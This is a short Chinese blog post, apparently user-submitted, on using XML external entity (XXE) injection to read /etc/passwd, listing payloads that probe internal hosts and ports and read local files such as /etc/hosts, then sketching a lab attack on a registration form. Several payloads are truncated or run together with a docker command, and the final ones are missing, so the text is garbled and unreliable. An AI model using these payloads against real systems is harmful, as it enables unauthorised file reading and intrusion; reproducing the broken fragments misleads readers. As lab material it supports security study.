利用xxe获取linux系统的passwd

网友投稿 329 2022-10-08


利用xxe获取linux系统的passwd

引用外部DTD文件访问内网主机/端口。

<!DOCTYPE a SYSTEM "(看响应时间)

引用外部DTD文件访问wai网。

<!DOCTYPE a SYSTEM ">

引用内部实体。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部实体读本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部实体访问内wang主机端口。

<!DOCTYPE a SYSTEM "a [<!ENTITY xxe SYSTEM "run -d -p 8082:80 rrodrigo/xxelab

抓取注册包,发现采用xml格式传递,且邮箱有返回:

将返回内容处进行xxe回显设置读取/etc/passwd

]>

利用base64编码进行xxe,防止有返回包验证

]>


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:java简单实现数组的增删改查方法
下一篇:华为防火墙实现双机热备配置详解(华为服务器双机热备)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~